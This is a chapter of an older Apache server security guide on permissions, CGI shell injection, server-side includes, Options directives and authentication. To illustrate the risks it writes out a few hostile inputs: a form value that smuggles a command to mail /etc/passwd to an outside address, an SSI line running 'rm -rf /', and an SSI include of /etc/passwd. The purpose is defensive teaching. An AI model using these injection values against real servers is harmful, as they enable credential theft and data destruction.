Apache Server Survival Guide asg16.htm
|
Bit Mode | Significance |
4000 | Set user ID on execution |
2000 | Set group ID on execution |
1000 | Set sticky bit* |
0400 | Read by owner |
0200 | Write by owner |
0100 | Execute (search in directory) by owner |
0040 | Read by group |
0020 | Write by group |
0010 | Execute (search in a directory) by group |
0004 | Read by others |
0002 | Write by others |
0001 | Execute by others |
*When set, unprivileged users cannot delete or rename files of other users in that directory
The main problem with CGIs is passing user variables when executing an exec() or system() call. These variables, if not carefully watched, could contain shell metacharacters that will cause the shell to do something other than what was intended.
Suppose you have a simple script that uses the UNIX utility grep to search the contents of a phone database. The user enters a first or last name, and the script returns any matching items. The script does most of its work like this (please note that Perl has much better, built-in ways of doing this). Here's the script:
system("grep $pattern database");
The pattern variable is set from a form input by the user. Now see what would happen if the user entered a line like the following:
"-v ffffffff /etc/passwd |mail someAddress"
This effectively would send your /etc/passwd file via e-mail to someAddress. The -v argument to grep tells it to include all lines that don't match. Our matching pattern ffffffff more than likely won't match anyone.
The real solution to this type of problem is to do several things. One easy way of dealing with this problem is by making a call to system a little differently:
system("/bin/grep", $pattern, "database");
By doing this, you have eliminated calling a shell. This effectively eliminated the calling of a shell, which would have interpreted the pipe and done something you didn't want. Alternatively, you could have escaped each special shell character before passing it to the grep call, as this line of Perl shows:
$pattern =~ s/[^\w]/\\\&/g; system("grep \"$pattern\" database");
Perl has built-in checks for shell metacharacters and other expressions that could spell trouble. To enable this feature, just start your Perl scripts with #!/usr/local/bin/perl -T.
This will enable Perl's taint checks. Data from outside the program (environment variables, standard input stream, or program arguments) cannot use eval(), exec(), system(), or piped open() calls. Any program variable that obtains a value from one of these sources also becomes tainted and cannot be used either. In order for you to use a tainted variable, you'll need to untaint it. Untainting requires that you perform a pattern matching on the tainted variable that extracts matched substrings. To untaint an e-mail address, use the following code:
$email=~/([\w-.]+\@[\w-.]+)/;
Server Parsed HTML (SPML), also known as Server Side Includes (SSI), provides a convenient way of performing server-side processing on an HTML file before it is sent to the client. This allows for the opportunity to introduce some dynamic features without having to program a CGI to provide the functionality.
SPML documents are processed by the server before they are sent to the client. Only documents with a MIME type text/x-server-parsed-html or text/x-server-parsed-html3 are parsed. The resulting HTML is given a MIME type text/html and is sent back to the client.
SPML can include information such as the current time, can execute a program, or can include a document, just by adding some special SPML commands to your HTML page. When the HTML page is properly identified to the server as containing SPML tokens, the server parses the file and sends the results to the client requesting it. While this seems rather innocuous, it isn't. SSIs are parsed like a script and can be a source of grief.
File inclusion is not usually a problem, as long as users are not including sensitive files such as /etc/passwd. One condition to watch for is SSI that are built from data provided by an user over the Web. Suppose that you created a bulletin board SSI that would include items added by external users via a CGI. If your CGI was not smart enough to check for what it is being handed, it is possible for a user to add something nasty such as a line like <!--#cmd cmd="/bin/rm -rf />. This, as you guessed, would attempt to remove all files in your disk. Obviously, the example is intended as an illustration.
Exercising security on your Web site means enforcing policies. If you happen to allow per-directory access files, in a way you have relinquished some control over the implementation of that policy. From an administrative point of view, it is much better to manage one global access file (conf/access.conf) with many different entries than a minimal global configuration file plus hundreds of per-directory access files.
Per-directory access files also have the terrible side effect of slowing down your server considerably because, once enabled, your server will scan each directory in the path to a request. If found, it then needs to figure out what options to apply and in what order. This takes time.
Permissions are specified in <Directory> sections in the global access control file or on a per-directory basis with .htaccess files. The Options directive specifies what server options are enabled for that particular server domain. Here are some of the options:
All | Enables all options except MultiViews. |
ExecCGI | Enables the execution of CGI programs. |
FollowSymLinks | Enables the traversing of symbolic links. |
Includes | Enables the use of SSI. |
IncludesNOEXEC | Enables the use of SSI with the following restrictions: The #exec and #include commands are disabled. |
Indexes | Enables the return of a server-generated directory listing for requests where there is no DirectoryIndex file (index.html). |
MultiViews | Enables content negotiation based on document language. See the LanguagePriority directive in Chapter 10, "Apache Modules." |
SymLinksIfOwnerMatch | The traversing of symbolic links is allowed if the target file or directory is owned by the same user as the link. This setting offers better security than the FollowSymLinks option. |
The following is a list of the security issues raised by the Options directive. Relevance to your particular application depends on what type of site you manage.
On my site, the option to run CGIs on a directory other than cgi-bin doesn't pose many security risks because I control all CGI programs on the server. However, if you have a melange of users, permitting execution of CGIs from anywhere may be too permissive and is a way of asking for trouble.
The FollowSymLinks option is another option to worry about. If a user is able to create a link to a directory from inside your Web document tree, she's just created an alternative way of navigating into the rest of your filesystem. You can consider this option as an easy way to publish your entire disk to the world. The SynLinksIfOwnerMatch option tries to mitigate this option a bit. However, both these options are very dangerous if your ship is not a tight one.
Includes allows the execution of SSI in the directory. This option can be tamed down by specifying the IncludesNOEXEC option, which disables file inclusion (so your users cannot do a <!----#include virtual=/etc/passwd -->) or executes programs from within an include statement.
This feature can be corrupted easily. If you recall the discussion about FollowSynLinks, automatic indexes go hand-in-hand with it. When the user travels to a directory that doesn't contain a user-generated index file, one gets generated by the server if you have automatic indexing enabled. This basically provides a nice listing of your files and provides a nice interface with which to retrieve them.
Apache provides you with several methods of authenticating users before you grant them access to your materials. Third-party modules provide support for an even greater number. You can authenticate using cookies, SQL databases, flat files, and so on. You can also control access to your machine based on the IP of the host requesting the documents. Neither of these methods provides a good measure of security by themselves; however, together they are much more robust.
There are a few issues that should be mentioned before you rely on any of these methods.
Although looking at a machine's address to determine if it is a friendly computer is better than not doing it, any host can be spoofed. Some evildoers on the Net can configure their computers to pretend to be someone you know. Usually this is done by making a real host unavailable and then making the Domain Name System (DNS) provide the wrong information. For your security, you may want to enable -DMAXIMUM_DNS while compiling the server software (under Apache 1.1 there's a new directive HostnameLookups that does the same thing as a runtime directive). This will solicit a little more work on your computer because DNS information will need to be verified more closely. Typically, the server will do a reverse lookup on the IP address of a client to get its name. Setting up the HostnameLookups will force one more test. After the name is received, the server will query DNS for its IP address. If they both match, things are cool. Otherwise, the access fails.
One problem with login and password verification over the Web is that an evildoer can have a ball at trying to crack a password. On many UNIX systems, if you tried this at a user account, the system would eventually disable access to the account, making it more difficult to break in. On the Web, you could try a few hundred passwords in a few seconds (with a little software) without anyone noticing it. Obviously, this doesn't present much danger, with the exception of obtaining access to private information, until you consider that most users use one password for most services.
Basic authentication is basic in that information exchanged between the browser and the server is not encrypted in any way. This method only encodes, not encrypts, the authentication session. Anyone that can intercept your authentication session can decode it and use the information to access your materials. The browser sends in authentication information with each request to the protected realm, which means that your login and password are sent not once, but several times through the wire.
To resolve this problem, a new method has been introduced: Digest authentication. Unlike Basic, Digest encodes and encrypts (trivially) the password in a way that it is only valid for the requested resource. If someone captured the authentication information and was able to decode it, that password would only be useful to retrieve that one resource. Access to each page requires a new password, which the browser generates. This makes the entire process a bit more secure.
If you want to have truly secure access to your server and you don't want to send passwords in the clear, the only current viable solution is to use an SSL server, such as Stronghold or Apache SSL. Chapter 14, "Secure Web Servers," goes into great detail about these products. An SSL server ensures that information sent between the browser and the server is kept confidential. So even if someone is spying on the line, it is very difficult to recover the original information. Secure transactions also ensure that the data you receive originated from a trusted point.
One way of reducing the likelihood of a problem is to reduce the number of sources to potential problems. One way of dealing with this is to reduce the number of software systems that could be subverted in an unexpected way, meaning your server should be as light as possible in the software department.
If you don't do much about security, the least you could do is frequently read the newsgroup comp.security.announce. This Usenet group contains posts for the Computer Emergency Response Team (CERT), which lists security holes as they are found. The CERT home page (see Figure 16.1) can be found at http://www.cert.org.
Figure 16.1. The CERT Coordination Center's home page.
In addition to CERT advisories, you may want to check Internet Security Systems, Inc.'s home page (see Figure 16.2). It is located at http://www.iss.net. Its Web site has a nice mailing list and a vulnerability database for a variety of programs where security problems are grouped. Naturally, there's one for Apache too.
Figure 16.2. Internet Security Systems, Inc.'s home page.
There are many excellent books available that will provide more detail than you'll probably ever need. Here's a few:
UNIX Security for the Organization, by Richard Bryant, Sams Publishing.
Internet Firewalls and Network Security, by Karanjit Siyan, Ph.D. and Chris Hare, New Riders Publishing.
Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky, O'Reilly & Associates, Inc.
Practical UNIX Security, by Simson Garfinkel and Gene Spafford, O'Reilly & Associates, Inc.
The issues in this chapter only begin to address a few of the many configuration issues that may affect the security of your site. Security is a very complex issue. Because of UNIX and the networking necessary to make a Web server work, your task is a complicated one. I hope some of the warnings will point you in the right direction. And yes, while some of the examples are extreme, they were meant to catch your attention. The truth is you really cannot be sure of what can be done. Expect the unexpected, and prepare for disaster. This way, should you be unfortunate and have a security breach, you'll be prepared to deal with it from a practical, as well as an emotional, point of view.
Document any security problems you may find. If you think something is not right, document it. If you shut down your system, the intruder will know she's been had, and it will be very difficult for you to track her. On the other hand, if you wait and document, you may have a better chance of catching her and finding out her true identity.